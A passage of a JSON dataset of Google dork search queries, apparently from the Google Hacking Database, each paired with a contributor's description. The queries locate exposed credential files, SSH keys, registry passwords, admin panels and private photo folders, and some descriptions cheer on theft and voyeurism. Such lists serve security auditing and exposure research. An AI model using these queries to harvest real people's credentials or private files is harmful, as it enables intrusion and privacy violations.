USERNAMES and stuff... *sigh* Sometimes there aren't words to describe how lame people can be. This particular theme can be carried further to find all sorts of things along these lines like .profile, .login, .logout files, etc. I just got bored with all the combinations..."}, {"dork": "intitle:index.of .bash_history", "description": "Ok, this file contains what a user typed at a shell command prompt. You shouldn't advertise this file. You shouldn't flash it to a web crawler. It contains COMMANDS and USERNAMES and stuff... *sigh* Sometimes there aren't words to describe how lame people can be. This particular theme can be carried further to find all sorts of things along these lines like .profile, .login, .logout files, etc. I just got bored with all the combinations..."}, {"dork": "inurl:admin inurl:userlist", "description": "This search reveals userlists of administrative importance. Userlists found using this method can range from benign \"message group\" lists to system userlists containing passwords."}, {"dork": "inurl:admin filetype:asp inurl:userlist", "description": "This search reveals userlists of administrative importance. Userlists found using this method can range from benign \"message group\" lists to system userlists containing passwords."}, {"dork": "\"index of\" / lck", "description": "These lock files often contain usernames of the user that has locked the file. Username harvesting can be done using this technique."}, {"dork": "index.of perform.ini", "description": "This file contains information about the mIRC client and may include channel and user names."}, {"dork": "inurl:php inurl:hlstats intext:\"Server Username\"", "description": "This page shows the halflife stat script and reveals the username to the system. Table structure, database name and recent SQL queries are also shown on most systems."}, {"dork": "filetype:reg reg HKEY_CURRENT_USER username", "description": "This search finds registry files from the Windows Operating system. Considered the \"soul\" of the system, these files, and snippets from these files contain sensitive information, in this case usernames and/or passwords."}, {"dork": "filetype:reg reg +intext:\"internet account manager\"", "description": "This google search reveals users names, pop3 passwords, email addresses, servers connected to and more. The IP addresses of the users can also be revealed in some cases."}, {"dork": "filetype:log username putty", "description": "These log files record info about the SSH client PUTTY. These files contain usernames, site names, IP addresses, ports and various other information about the SSH server connected to."}, {"dork": "filetype:conf inurl:proftpd.conf -sample", "description": "A standard FTP configuration file that provides far too many details about how the server is setup, including installation paths, location of logfiles, generic username and associated group, etc"}, {"dork": "inurl:root.asp?acs=anon", "description": "This search jumps right to the main page of Outlook Web Access Public Folders and the Exchange Address Book:.An attacker can use the addressbook to enumerate usernames anonymously without having to logon. These usernames can then be used to guess the mailbox passwords. An attacker can also browse the public folders to gather extra information about the organisation."}, {"dork": "site:extremetracking.com inurl:\"login=\"", "description": "The search reveals usernames (right in the URL in green) and links to the sites that are signed up with extremetracking.com. From here an attacker can view any of the sites stats, including all the visitors to the site that is being tracked, including their IP adresses."}, {"dork": "inurl:/profile.php?lookup=1", "description": "inurl:/profile.php?lookup=1\nThis google dork will help find administrator name in most websites and forums..Very helpful in brute forcing ...\nCreated SIVABALAN ( De King OF CYber )"}, {"dork": "\"authentication failure; logname=\" ext:log", "description": "Finds log files for failed logins, containing usernames and login paths.\nDxtroyer"}, {"dork": "\"username.xlsx\" ext:xlsx", "description": "\"username.xlsx\" ext:xlsx\r\n\r\nexcel files containing username\r\n\r\nManhNho"}, {"dork": "intitle:index.of \"users.db\"", "description": "dork:\r\nintitle:index.of \"users.db\"\r\n\r\nAuthor:Mayur Parmar(th3cyb3rc0p)"}, {"dork": "intitle:\"index of\" service.grp", "description": "# Google Dork: intitle:\"index of\" service.grp\r\n\r\n# By using this dork it's possible to find some admin usernames in\r\nplain-text.\r\n\r\n# Date: 13/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "allintext:username filetype:log", "description": "# Dork : allintext:username filetype:log\r\n# This Dork will show lot of results that include usernames inside all .log files.\r\n# Author : Shivanshu Sharma\r\n\r\nSent from Mail for Windows 10"}, {"dork": "intitle:\"index of\" \"users.sql\"", "description": "# Dork :intitle:\"index of\" \"users.sql\"\r\n# Sensitive informations : User Names and Password\r\n# Author : Ambadi MP"}, {"dork": "intitle:\"index of\" \"/ftpusers\"", "description": "Title: File containing juicy info\r\nGoogle Dork: intitle:\"index of\" \"/ftpusers\"\r\nDate: 02/07/2020\r\nAuthor : Mohit Khemchandani"}, {"dork": "intitle:\"index of\" \"tomcat-users.xml\"", "description": "Description: intitle:\"index of\" \"tomcat-users.xml\"\r\nThis google dork gives us the web server apache tomcat username, password,\r\nroles details."}, {"dork": "\"index of\" \"users.frm\"", "description": "# Google Dork: \"index of\" \"users.frm\"\r\n# Description :- Disclosure of database file tables and sensitive files.\r\n# Date: 13/09/2020\r\n# Author: Sahil Saxena\r\n# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174\r\n# Twitter: https://twitter.com/Sahil_delinitor\r\n# GitHub: https://github.com/Sahil-69\r\n# Bugcrowd: https://bugcrowd.com/Prickn\r\n\r\nThanks,\r\nSahil Saxena"}, {"dork": "File contains Sensitive Information", "description": "Google Dorks: \"index of\" \"*.usernames.txt\"\r\n\r\nCategory: File contains Sensitive Information\r\n\r\nAuthor: Abishekraghav Murugeashan\r\n\r\nLinkedIn: https://www.linkedin.com/in/arhaxor21/"}, {"dork": "\"CREATE ROLE\" + \"ENCRYPTED PASSWORD\" ext:sql | ext:txt | ext:ini -git -gitlab", "description": "# Google Dork: \"CREATE ROLE\" + \"ENCRYPTED PASSWORD\" ext:sql | ext:txt | ext:ini -git -gitlab\r\n\r\n# Exposed usernames, passwords and more...\r\n\r\n# Date: 9/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"/parameters.yml*\"", "description": "# Google Dork: intitle:\"index of\" \"/parameters.yml*\"\r\n\r\n# Files containing usernames and passwords.\r\n\r\n# Date: 17/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "jdbc:mysql://localhost:3306/ + username + password ext:yml | ext:java -git -gitlab", "description": "# Google Dork: jdbc:mysql://localhost:3306/ + username + password ext:yml | ext:java -git -gitlab\r\n# Exposed usernames and passwords.\r\n# Date: 20/10/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:user intitle:index of ext:sql | xls | xml | json | csv", "description": "# Title: Sensitive Data Exposure\r\n# Google Dork: inurl:user intitle:index of ext:sql | xls | xml | json | csv\r\n# Date: 2020-09-24\r\n\r\n# Author: Virendra Tiwari\r\n# LinkedIn: https://www.linkedin.com/in/virendratiwari/\r\n\r\nThanks and Regards,\r\nVirendra Tiwari"}, {"dork": "filetype:csv intext:\"Secret access key\"", "description": "# Dork: filetype:csv intext:\"Secret access key\""}, {"dork": "\"DefaultPassword\" ext:reg \"[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]\"", "description": "# Google Dork: \"DefaultPassword\" ext:reg \"[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon]\"\r\n\r\n# Exposed default usernames and passwords in Windows registry.\r\n\r\n# Date: 10/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"filezilla.xml\"", "description": "# Google Dork: intitle:\"index of\" \"filezilla.xml\"\r\n\r\n# Sensitive directories containing many times usernames and passwords.\r\n\r\n# Date: 5/11/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"sitemanager.xml\" | \"recentservers.xml\"", "description": "# Google Dork: intitle:\"index of\" \"sitemanager.xml\" | \"recentservers.xml\"\r\n# Sensitive directories containing many times usernames and passwords.\r\n# Date: 9/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"password.yml", "description": "#Google Dork : intitle:\"index of\" \"password.yml\"\r\n#Exploit Title : usernames and passwords can be found.\r\n#Date : 17/11/2020\r\n\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "jdbc:sqlserver://localhost:1433 + username + password ext:yml | ext:java", "description": "# Google Dork: jdbc:sqlserver://localhost:1433 + username + password ext:yml | ext:java\r\n# Exposed usernames and passwords.\r\n# Date: 9/1/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"'dsn: mysql:host=localhost;dbname=\" ext:yml | ext:txt \"password:\"", "description": "# Google Dork: \"'dsn: mysql:host=localhost;dbname=\" ext:yml | ext:txt \"password:\"\r\n# Exposed usernames and passwords.\r\n# Date: 9/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"credentials.xml\" | \"credentials.inc\" | \"credentials.txt\"", "description": "# Google Dork: intitle:\"index of\" \"credentials.xml\" | \"credentials.inc\" | \"credentials.txt\"\r\n# Files containing usernames and passwords.\r\n# Date: 19/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"db.properties\" | \"db.properties.BAK\"", "description": "# Google Dork: intitle:\"index of\" \"db.properties\" | \"db.properties.BAK\"\r\n\r\n# Files containing usernames and passwords.\r\n\r\n# Date: 27/11/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"contacts.txt\"", "description": "# Google Dork: intitle:\"index of\" \"contacts.txt\"\r\n\r\n# Files Containing Juicy Info\r\n\r\n# Exploit Author: Axel Meneses"}, {"dork": "intext:\"-----BEGIN CERTIFICATE-----\" ext:txt", "description": "# Google Dork: intext:\"-----BEGIN CERTIFICATE-----\" ext:txt\r\n\r\n# Pages Files Containing Juicy Info\r\n\r\n# Date: 13/08/2021\r\n\r\n# Exploit Author: Aftab Alam"}, {"dork": "intitle:\"index of\" \"/usernames\"", "description": "# Google Dork: intitle:\"index of\" \"/usernames\"\r\n# Files Containing Usernames\r\n# Date: 24/08/2021 \r\n# Exploit Author: Priyanshu Choudhary"}, {"dork": "\"Header for logs at time\" ext:log", "description": "\"Header for logs at time\" ext:log"}, {"dork": "\"START test_database\" ext:log", "description": "\"START test_database\" ext:log"}], "Sensitive Directories": [{"dork": "index.of.secret", "description": "What kinds of goodies lurk in directories marked as \"secret?\" Find out..."}, {"dork": "index.of.private", "description": "What kinds of things might you find in directories marked \"private?\" let's find out...."}, {"dork": "index.of.secure", "description": "What could be hiding in directories marked as \"secure?\" let's find out..."}, {"dork": "index.of.protected", "description": "What could be in a directory marked as \"protected?\" Let's find out..."}, {"dork": "intitle:\"index.of.personal\"", "description": "This directory has various personal documents and pictures."}, {"dork": "inurl:explorer.cfm inurl:(dirpath|This_Directory)", "description": "Filemanager without authentication."}, {"dork": "intitle:\"index of\" intext:\"content.ie5\"", "description": "This dork indicates the \"Local settings\" dir in most cases, and browseble server directories in general."}, {"dork": "allinurl:\"/*/_vti_pvt/\" | allinurl:\"/*/_vti_cnf/\"", "description": "Frontpage extensions for Unix ? So be it.."}, {"dork": "intitle:upload inurl:upload intext:upload -forum -shop -support -w3c", "description": "The search reveals server upload portals.An attacker can use server space for his own benefit."}, {"dork": "\"Index of\" rar r01 nfo Modified 2004", "description": "New Warez Directory Lists"}, {"dork": "intitle:index.of /maildir/new/", "description": "search gives you a mailbox dir. Contains a lot of mails."}, {"dork": "intitle:\"Backup-Management (phpMyBackup v.0.4 beta * )\" -johnny.ihackstuff", "description": "phpMyBackup is an mySQL backup tool, with features like copying backups to a different server using FTP."}, {"dork": "intitle:\"Folder Listing\" \"Folder Listing\" Name Size Date/Time File Folder", "description": "directory listing for Fastream NETFile Web Server"}, {"dork": "\"Directory Listing for\" \"Hosted by Xerver\"", "description": "directory listing for Xerver web server"}, {"dork": "\"Welcome to the directory listing of\" \"NetworkActiv-Web-Server\"", "description": "this is for NetworkActiv-Web-Server directory listing"}, {"dork": "\"Warning: Installation directory exists at\" \"Powered by Zen Cart\" -demo", "description": "by this dork you can find fresh installations of Zen-Cartsee Full Disclosure forums fore details... ;)"}, {"dork": "inurl:install.pl intext:\"Reading path paramaters\" -edu", "description": "Excelent information for foot holds. Everything from OS, to forum software, etc. Other exploits possible"}, {"dork": "intitle:index.of cisco asa -site:cisco.com", "description": "Google search for Pix/Asa images \nAuthor: fdisk"}, {"dork": "intitle:index.of ios -site:cisco.com", "description": "Google search for Cisco IOS images\nAuthor: fdisk"}, {"dork": "allintext:\"WebServerX Server at\"", "description": "Quick and dirty WebserverX HTTP server google dork"}, {"dork": "\"Index of /backup\"", "description": "Backup directories are often very interesting places to explore. More than one server has been compromised by a hacker's discovery of sensitive information contained in backup files or directories. Some of the sites in this search meant to reveal the contents of their backup directories, others did not. Think about it. What.s in YOUR backup directories? Would you care to share the contents with the whole of the online world? Probably not. Whether intentional or not, bsp.gsa.gov reveals backup directory through Google. Is this simply yet another misconfigured .gov site? You decide. BSP stands for \"best security practices,\" winning this site the Top GoogleDork award for this category."}, {"dork": "\"index of\" inurl:root intitle:symlink", "description": "Google Dork: index of\" inurl:root intitle:symlink\nSteal Others Symlink\nAuthor: Un0wn_X"}, {"dork": "inurl:8080 intitle:\"Dashboard [Jenkins]\"", "description": "#Summary: Acces to Jenkins Dashboard\n#Author: g00gl3 5c0u7"}, {"dork": "inurl:/cgi-bin/.cgi", "description": "Finds open index of /cgi-bin."}, {"dork": "\"Config\" intitle:\"Index of\" intext:vpn", "description": "Directory with keys of vpn servers.\nBy Rootkit."}, {"dork": "intitle:index.of +\"Indexed by Apache::Gallery\"", "description": "Google dork for finding Private pics ;) :D\n#13lacKDemOn"}, {"dork": "intitle:index.of.accounts", "description": "Dork for directory with accounts.\nBy Rootkit."}, {"dork": "intitle:index.of.dropbox", "description": "Sensitive Directories\nAriel Anonis - @ariel_anonis"}, {"dork": "inurl:private_files", "description": "Directory private files xD.\nBy Rootkit."}, {"dork": "intitle:\"Index Of\" intext:\"iCloud Photos\" OR intext:\"My Photo Stream\" OR intext:\"Camera Roll\"", "description": "From: Creep Mode Baby"}, {"dork": "intitle:\"Index of\" \"wwwroot\"", "description": "Directory of wwwroot Dork. Enjoy xD.\nBy Rootkit."}, {"dork": "intitle:\"Index of\" \"DCIM\"", "description": "A lot of Camera Photos Dump.\nHave Fun!.\nRootkit."}, {"dork": "intitle:\"Index of\" \"WhatsApp Images\"", "description": "WhatsApp Images folder, usually from backups.\n--pmbento"}, {"dork": "mail spool intitle:index.of", "description": "Dork for mail spools.\nDecoy"}, {"dork": "inurl:.listing intitle:index.of", "description": "Directories with .listing files.\nBy Rootkit Pentester."}, {"dork": "inurl:.DS_Store intitle:index.of", "description": "Directories with DS_Store files.\nBy Rootkit Pentester."}, {"dork": "\"sql\" \"parent\" intitle:index.of -injection", "description": "Directories containing SQL Installs and/or SQL databases...\nDecoy"}, {"dork": "intitle:index.of inurl:grades site:edu", "description": "Directories containing grades.\nDecoy"}, {"dork": "inurl:\"wp-content/uploads/private\"", "description": "Directories with juicy data.\nDork by Rootkit Pentester."}, {"dork": "inurl:pipermail intitle:index.of parent", "description": "Pipermail Archives\nDecoy"}, {"dork": "intitle:index.of.mail", "description": "Dork with juicy info. Enjoy xD.\nDork by Rootkit Pentester."}, {"dork": "inurl:.ssh intitle:index.of authorized_keys", "description": "SSH Keys\ninurl:.ssh intitle:index.of authorized_keys\nDecoy"}, {"dork": "inurl:\"folderview?id=\" site:drive.google.com", "description": "Finds people's private folders on Google Drive\nDxtroyer"}, {"dork": "inurl:\"/drive/folders/\" site:drive.google.com", "description": "Google Drive folders\n-Xploit"}, {"dork": "-inurl:htm -inurl:html intitle:\"index of\" 100CANON", "description": "Explore the Images and photos uploaded and saved in Directories from Canon\nDSLRs and Camera @Reveal2Maviya #Reveal2Maviya\n\"-inurl:htm -inurl:html intitle:\"index of\" 100CANON\""}, {"dork": "-inurl:htm -inurl:html intitle:\"index of\" NIKON", "description": "Explore the Images and photos uploaded and saved in Directories from Nikon\nDSLRs and Camera @Reveal2Maviya #Reveal2Maviya\n-inurl:htm -inurl:html intitle:\"index of\" NIKON"}, {"dork": "intitle:\"Index of /\" \"joomla_update.php\"", "description": "Finds directories with Joomla logs, often containing juicy info\nDxtroyer"}, {"dork": "index of /htdocs", "description": "Which is used to find unauthorised web-servers,and find all sensitive info\nthrough 'htdocs' folder. Also can find xamp servers.\nDagalti Kick"}, {"dork": "\"m.zippyshare.com/\"", "description": "maybe directory trick listener i dont know but useful :)\ntype on google this this form.: \"m.zippyshare.com/\"\n- zoltan"}, {"dork": "inurl:admin inurl:uploads", "description": "Fishes images and text from upload sites\r\n\r\n\r\n\r\n- Toby"}, {"dork": "intitle:index.of intext:viewvc", "description": "ViewVC is a browser interface for CVS and Subversion version control\nrepositories. This dork allows you to list those that are indexed and open\nfor viewing.\nSome contain source code, private SSH keys, configuration files, and more.\n--\nparagonsec"}, {"dork": "inurl:/xampp", "description": "this dork looks for servers with xampp installed"}, {"dork": "index.of.winnt", "description": "The \\WINNT directory is the directory that Windows NT is installed into by default. Now just because google can find them, this doesn't necessarily mean that these are Windows NT directories that made their way onto the web. However, sometimes this happens. Other times, they aren't Windows NT directories, but backup directories for Windows NT data. Wither way, worthy of a nomination."}, {"dork": "index.of.password", "description": "These directories are named \"password.\" I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named \"password\" and single html files inside named things liks \"horny.htm\" or \"brittany.htm.\" These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn..."}, {"dork": "inurl:backup intitle:index.of inurl:admin", "description": "This query reveals backup directories. These directories can contain various information ranging from source code, sql tables, userlists, and even passwords."}, {"dork": "\"Welcome to phpMyAdmin\" \" Create new database\"", "description": "phpMyAdmin is a widly spread webfrontend used to mantain sql databases. The default security mechanism is to leave it up to the admin of the website to put a .htaccess file in the directory of the application. Well gues what, obviously some admins are either too lazy or don't know how to secure their directories. These pages should obviously not be accessable to the public without some kind of password ;-)"}, {"dork": "intitle:\"Index of c:\\Windows\"", "description": "These pages indicate that they are sharing the C:\\WINDOWS directory, which is the system folder for many Windows installations."}, {"dork": "intitle:\"Index of\" cfide", "description": "This is the top level directory of ColdFusion, a powerful web development environment. This directory most likely contains sensitive information about a ColdFusion developed site."}, {"dork": "\"index of cgi-bin\"", "description": "CGI directories contain scripts which can often be exploited by attackers. Regardless of the vulnerability of such scripts, a directory listing of these scripts can prove helpful."}, {"dork": "inurl:j2ee/examples/jsp", "description": "This directory contains sample JSP scripts which are installed on the server. These programs may have security vulnerabilities and can be used by an attacker to footprint the server."}, {"dork": "inurl:ojspdemos", "description": "This directory contains sample Oracle JSP scripts which are installed on the server. These programs may have security vulnerabilities and can be used by an attacker to footprint the server."}, {"dork": "inurl:/pls/sample/admin_/help/", "description": "This is the default installation location of Oracle manuals. This helps in footprinting a server, allowing an attacker to determine software version information which may aid in an attack."}, {"dork": "\"index of\" inurl:recycler", "description": "This is the default name of the Windows recycle bin. The files in this directory may contain sensitive information. Attackers can also crawl the directory structure of the site to find more information. In addition, the SID of a user is revealed also. An attacker could use this in a variety of ways."}, {"dork": "inurl:/tmp", "description": "Many times, this search will reveal temporary files and directories on the web server. The information included in these files and directories will vary, but an attacker could use this information in an information gathering campaign."}, {"dork": "intitle:intranet inurl:intranet +intext:\"human resources\"", "description": "According to whatis.com: \"An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet.\"This search allows you to not only access a companies private network, but also provides employee listings and other sensitive information that can be incredibly useful for any social engineering endeavour"}, {"dork": "\"Index Of /network\" \"last modified\"", "description": "Many of these directories contain information about the network, though an attacker would need a considerable amount of patience to find it."}, {"dork": "intitle:\"album permissions\" \"Users who can modify photos\" \"EVERYBODY\"", "description": "Gallery (http://gallery.menalto.com) is software that allows users to create webalbums and upload pictures to it. In some installations Gallery lets you access the Admin permission page album_permissions.php without authentication. Even if not \"everybody\" has modify rights, an attacker can do a search for \"users who can see the album\" to retrieve valid usernames for the gallery."}, {"dork": "filetype:cfg ks intext:rootpw -sample -test -howto", "description": "Anaconda is a linux configuration tool like yast on suse linux. The root password is often encrypted - like md5 or read from the shadow. Sometimes an attacker can also get a cleartext password.There are more ks configs then you might expect and with a bit of searching through the result list an attacker can find the root password and own that system."}, {"dork": "intitle:\"index of /phpmyadmin\" modified", "description": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields (http://sourceforge.net/projects/phpmyadmin/).An attacker can use this search to find phpMyAdmin enabled MySQL servers by using the \"index of /\" method. Consider this an alternative way an attacker could find them besides the older Googledorks for phpMyAdmin."}, {"dork": "index.of.password", "description": "These directories are named \"password.\" I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named \"password\" and single html files inside named things liks \"horny.htm\" or \"brittany.htm.\" These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...Moderator note: This googledork has expired ! See also:http://johnny.ihackstuff.com/index.php?module=ProdReviews&func=showcontent&id=380"}, {"dork": "\"index of\" / picasa.ini", "description": "Picasa is an 'Automated Digital Photo Organizer' recently aquired by Google. This search allows the voyer to browse directories of photos uploaded using the picasa software."}, {"dork": "intext:\"d.aspx?id\" || inurl:\"d.aspx?id\"", "description": "\"The YouSendIt team was formed to tackle a common problem: secure transmission of large documents online without the use of clumsy client software, mail servers with limited storage space, and sharing passwords. By eliminating the size constraints and security risks of sending files by email, YouSendIt has turned the most common form of communication on the Internet into the best method of secure document transimssion.\"This search shows the files that were transmitted. A malicious user could download them from these pages. This company tends to hold the users responsible for content, while at the same time exposing their pages to Google.. way to go guys.."}, {"dork": "intitle:index.of /AlbumArt_", "description": "Directories containing commercial music.AlbumArt_{.*}.jpg are download/create by MS-Windows Media Player in music directory."}, {"dork": "intitle:\"Index of *\" inurl:\"my shared folder\" size modified", "description": "These are index pages of \"My Shared Folder\". Sometimes they contain juicy stuff like mp3's or avi files. Who needs pay sites for music when you got Google ? :) Uhm, well except for the copyright issue."}, {"dork": "intitle:index.of (inurl:fileadmin | intitle:fileadmin)", "description": "TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.The fileadmin directory is the storage for all user data like website templates, graphics, documents and so on. Normally no sensitive data will be stored here except the one made available in restricted areas.Unprotected fileadmin directories can be found by an attacker using this query.Vendor: http://www.typo3.com/"}, {"dork": "intitle:\"webadmin - /*\" filetype:php directory filename permission", "description": "Webadmin.php is a free simple Web-based file manager. This search finds sites that use this software. If left unprotected an attacker files can be modified or added on the server.More info and screenshot at: http://cker.name/webadmin/"}, {"dork": "intitle:\"Directory Listing For\" intext:Tomcat -int", "description": "The Google Hackers Guide explains how to find Apache directory indexes, which are the most common found on the Internet. There are other ways however.This query is a generic search for servers using Tomcat with directory listings enabled. They are a bit more fancy than Apache's default lists and more importantly they will not be found using \"index.of\"."}, {"dork": "index.of.dcim", "description": "The DCIM directory is the default name for a few brands of digital camers. This is not a big network security risk, but like netcams it can reveal juicy details if found on corporate intranets."}, {"dork": "intitle:\"index of\" -inurl:htm -inurl:html mp3", "description": "Yes! I probably have should have told you guys earlier, but this is how ive been getting 100% of my mp3s. It fricken rocks, use it and abuse it. Downfalls to it... a)sometimes you shouldnt include mp3 in the query and getting what you want takes several different methods of searching b)a lot of the time google gives you results and they are not there thanks to good old friend 404 c)finding stuff takes a lot of practice. Goods... a)ive found whole albums b)ive mass downloaded directories of hundreds of songs that i have intrest in c)its exciting seeing the results, like fining treasure."}, {"dork": "\"intitle:Index.Of /\" stats merchant cgi-* etc", "description": "This search looks for indexes with the following subdirectories: stats, merchant, online-store and cgi-local or cgi-bin. These servers have a shopping cart application called softcart in their cgi-local or cgi-bin directory. Reportedly, it is possible to execute arbitrary code by passing a malformed CGI parameter in an HTTP GET request. This issue is known to affect SoftCart version 4.00b."}, {"dork": "intext:\"Powered By: TotalIndex\" intitle:\"TotalIndex\"", "description": "TotalIndex v2.0 is an open source script that is designed to replace the simple, and boring default index page of a site which lists the files in an indexed folder. It's not PW protected so an attacker can browse the files and take what they want."}, {"dork": "intitle:\"index of\" \"parent directory\" \"desktop.ini\" site:dyndns.org", "description": "This search uses desktop.ini to track users with a webserver running on their desktop computers. It can easily be extended to find specific documents."}, {"dork": "\"Powered by Invision Power File Manager\" (inurl:login.php) | (intitle:\"Browsing directory /\" )", "description": "Invision Power File Manager is a popular file management script, written in the popular PHP Scripting Language. It is compatiable with all forms of Unix and Windows and allows the user to control their files via any modern browser."}, {"dork": "intitle:\"Index of /CFIDE/\" administrator", "description": "With ColdFusion, you can build and deploy powerful web applications and web services with far less training time and fewer lines of code than ASP, PHP, and JSP.The search that pulls up directory listings we probably shouldn't be seeing.. entering the 'administrator' directory brings up a ColdFusion login screen"}, {"dork": "intitle:index.of abyss.conf", "description": "These directories reveal the configuration file of the abyss webserver. These files can contain passwords."}, {"dork": "intitle:\"index of\" inurl:ftp (pub | incoming)", "description": "Adding \"inurl:ftp (pub | incoming)\" to the \"index.of\" searches helps locating ftp websites. This query can easily be narrowed further with additional keywords."}, {"dork": "intitle:\"HFS /\" +\"HttpFileServer\"", "description": "\"The HttpFileServer is a Java based mechanism for providing web access to a set of files on a server. This is very similar to Apache Directory Indexing but provides the ability to upload files as well.\" http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=1516"}, {"dork": "\"Web File Browser\" \"Use regular expression\"", "description": "This will ask google to search for a php script used to manage files on a server. The script \"Web File Browser\" enables users to change files on the server. The script comes un-protected, which means that anyone who knows the exact path of the php file can have admin access to files on that server."}, {"dork": "filetype:torrent torrent", "description": "Torrent files .. don't expect to find spectacular stuff with this kind of string, this just to shows you can use Google for all kinds of filetypes, not just pdf or html.."}, {"dork": "filetype:ini Desktop.iniintext:mydocs.dll", "description": "This dork finds any webshared windows folder inside my docs. You can change the end bit \"intext:mydocs.dll\" by looking inside any of your your own folders on your pc, looking for the desktop.ini file and add some of the information to the query. For Anouther example - Shell Folders (Favourite etc) filetype:ini Desktop.iniintext:shell32.dllEnjoy"}, {"dork": "intitle:index.of WEB-INF", "description": "Finds java powered web servers which have indexing enabled on their config directory"}, {"dork": "intitle:\"pictures thumbnails\" site:pictures.sprintpcs.com", "description": "This search reveals the photo albums taken by Sprint PCS customers. Pictures taken with Sprint's cell phone service can be shared on their website. This search exposes the thumbnail album, only if the user has elected to share the photo album.Nothing like the Paris Hilton pictures, but there are pictures of people drunk at parties, dancing, girlfriens and so on."}, {"dork": "log inurl:linklint filetype:txt -\"checking\"", "description": "Linklint is an Open Source Perl program that checks links on web sites. This search finds the Linklint log directory. Complete site map able to be recreated, and if you go back one directory you can see all the other files generated by linklint. Thanks to CP for direction."}, {"dork": "allintitle:\"FirstClass Login\"", "description": "allintitle:\"FirstClass Login\" this is for firstclass directory listingsgo to http://[target]/[path]/Search type just ' in search field and you have a list of downloadable files, you don't see all files on server but you can search for a robots.txt with some folders path or other info for site scructure, crawling in this way you have unauthorized access on all files on the target server"}, {"dork": "intitle:index.of.config", "description": "These directories can give information about a web servers configuration. This should never be viewable to the public as some files may contain cleartext of encrypted passwords, depending on the level of security. It can also contain information on various ports, security permisions..etc."}, {"dork": "inurl:ckfinder intext:\"ckfinder.html\" intitle:\"Index of /ckfinder\"", "description": "Dork: inurl:ckfinder intext:\"ckfinder.html\" intitle:\"Index of /ckfinder\"\nUse this dork to find root directory of CKFinder (all versions) with\nckfinder.html file (used to upload, modify and delete files on the server)\nSubmitted by: CodiObert"}, {"dork": "\"index of\" inurl:sym", "description": "Google Dork: \"index of\" inurl:sym\nYou can Steal the symlinks of other Servers\nAuthor: Un0wn_X"}, {"dork": "intitle:\"index.of\" | inurl:/filemanager/connectors/ intext:uploadtest.html", "description": "Open Custom File Uploader specifically in \"/ FCKeditor/..\" \r\n\r\n\r\nAuthor: Parth S. Patel\r\nhttps://ca.linkedin.com/in/parthpateloscp"}, {"dork": "inurl:\"/wp-json/\" -wordpress", "description": "Google dork *description: * Sites running WordPress CMS and access to the\r\nwp-json API endpoint which *might* be vulnerable to content injection\r\n\r\n*Google Search: *inurl:\"/wp-json/\" -wordpress\r\n\r\nSubmitted by: Alfie\r\n\r\nWebsite: (https://the-infosec.com)"}, {"dork": "intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0jkrqfKh5hhiqD1", "description": "# Exploit Title: google dork for apache directory listing by url edit\n# Google Dork: intext:xampp-dav-unsecure:$apr1$6O9scpDQ$JGw2Tjz0jkrqfKh5hhiqD1\n in this query you see that text file but by url we can travel in paren directory \n# Date: 11/7/2013\n# Exploit Author: james love india\n# Tested on: windows xp sp2"}, {"dork": "intitle:index.of intext:.bash_history", "description": "the GHDB on subject (intitle:index.of intext:.bash_history) finds all\nhome users directory path indexed. I've test it and google return 943\nresults!\n-Andrea Menin"}, {"dork": "intitle:\"index of\" myshare", "description": "Google search for shared HDD directories or shared directories on servers.\nGives access to often unconsciously shared documents, programs or\nsensitive information.\nAlso are often other directories on these drives accessible.\nDork by :\nredN00ws"}, {"dork": "intitle:\"index of\" intext:\".ds_store\"", "description": "Mac OSX directories\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "allinurl:/hide_my_wp=", "description": "i just found a google dork that is\nfile/path disclosure of\nHide My WP plugin\nGoogle dork - allinurl:/hide_my_wp=\nit will show the plugin file folder and all file.\n thanks\nkamrul hassan arman"}, {"dork": "\"jos_users\" intitle:\"Index of\"", "description": "\"jos_users\" intitle:\"Index of\"\nFiles of configuration of user Joomla servers.\nBy Rootkit."}, {"dork": "inurl:/wp-content/wpbackitup_backups", "description": "Relates to https://wordpress.org/plugins/wp-backitup/\nSensitive data/site rips/db rips in public accessible folders\nMr T3st3r"}, {"dork": "intitle:\"Index of ftp\"", "description": "This dork finds open ftps. This is a base dork, where you can add\nintext:\"ssh/\" for folder search and intext:\"-2015\" for dates and years.\nAuthor:NickiK."}, {"dork": "inurl:wp-admin/ intext:css/", "description": "The dork finds misconfigured WordPress sites.\nAuthor:NickiK."}, {"dork": "intitle:\"index of\" \"onetoc2\" \"one\"", "description": "# Exploit Title: intitle:\"index of\" \"onetoc2\" \"one\"\n# Google Dork: 